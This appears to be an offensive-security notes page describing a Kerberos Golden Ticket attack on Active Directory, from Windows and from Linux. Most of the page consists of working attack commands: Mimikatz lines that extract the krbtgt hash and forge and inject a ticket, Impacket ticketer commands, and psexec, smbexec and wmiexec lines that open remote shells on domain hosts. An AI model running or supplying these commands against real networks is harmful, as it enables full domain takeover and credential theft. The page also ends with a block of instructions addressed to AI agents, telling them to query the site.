# Golden Ticket with krbtgt

Requirement:

* Env -> domain controller
* This attack assumes a Domain Controller compromise where `KRBTGT` account hash will be extracted which is a requirement for a successful Golden Ticket attack.

<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket>

{% hint style="info" %}
A **Golden Ticket** attack consist on the **creation of a legitimate Ticket Granting Ticket (TGT) impersonating any user** through the use of the **NTLM hash of the Active Directory (AD) krbtgt account**. This technique is particularly advantageous because it **enables access to any service or machine** within the domain as the impersonated user. It's crucial to remember that the **krbtgt account's credentials are never automatically updated**.

To **acquire the NTLM hash** of the krbtgt account, various methods can be employed. It can be extracted from the **Local Security Authority Subsystem Service (LSASS) process** or the **NT Directory Services (NTDS.dit) file** located on any Domain Controller (DC) within the domain. Furthermore, **executing a DCsync attack** is another strategy to obtain this NTLM hash, which can be performed using tools such as the **lsadump::dcsync module** in Mimikatz or the **secretsdump.py script** by Impacket. It's important to underscore that to undertake these operations, **domain admin privileges or a similar level of access is typically required**.
{% endhint %}

Sample extract krbtgt's account hash:

```
mimikatz # lsadump::lsa /inject /name:krbtgt
```

<figure><img src="/files/ulw3tjDDtsgf8JOr1pzE" alt=""><figcaption><p><a href="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution">https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution</a></p></figcaption></figure>

## Golden Ticket Attack from Windows

Inject golden ticket to memory:

```
mimikatz # kerberos::golden /domain:offense.local /sid:S-1-5-21-4172452648-1021989953-2368502130 /rc4:8584cfccd24f6a7f49ee56355d41bd30 /user:newAdmin /id:500 /ptt
```

<figure><img src="/files/gsiZVrpR5OJIV6HW9w3K" alt=""><figcaption><p><a href="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution">https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution</a></p></figcaption></figure>

check the ticket with `klist`

**Once** you have the **golden Ticket injected**, you can access the shared files **(C$)**, and execute services and WMI, so you could use **psexec** or **wmiexec** to obtain a shell (looks like yo can not get a shell via winrm).

switching back to the console the attacker used to create the golden ticket (local admin) and again attempting to access `c$` share of the domain controller - this time is a success:

<figure><img src="/files/Jifpp55w31lk7FdrJAJg" alt=""><figcaption><p><a href="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution">https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution</a></p></figcaption></figure>

or Execute a cmd in the remote machine with PsExec:

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

reference:

<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution>\
<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket>

## Golden Ticket Attack from Linux

Requirement:

* krbtgt hash

<figure><img src="/files/7BXKv9MbzyehyLtzZ5KY" alt=""><figcaption></figcaption></figure>

* Domain SID

```
#powerview
Get-ADDomain <domain_name>
```

<figure><img src="/files/htFkcxYGZERG2NmAk1TA" alt=""><figcaption></figcaption></figure>

```
#impacket

# generate the TGT with NTLM
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> NewAdmin

# generate the TGT with AES key
impacket-ticketer -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> NewAdmin


# export ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# execute remote command with any of the folowing by using TGT
impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

{% hint style="info" %}
Don't forget to use hostname instead of IP address of the remote server
{% endhint %}

{% hint style="info" %}
"Kerberos SessionError: KRB\_AP\_ERR\_SKEW(Clock skew too great)"

it's mean there is mismatch datetime between kali linux and the remote machine, because authenticating using TGT is using time also.

\
Solve with this:

`sudo ntpdate $IP`
{% endhint %}

## Convert TGT Windows and Linux Format

<https://github.com/Zer1t0/ticket_converter>

To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter):

```
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacker-mind.gitbook.io/hacker-mind/post-exploit/active-directory/golden-ticket-with-krbtgt.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.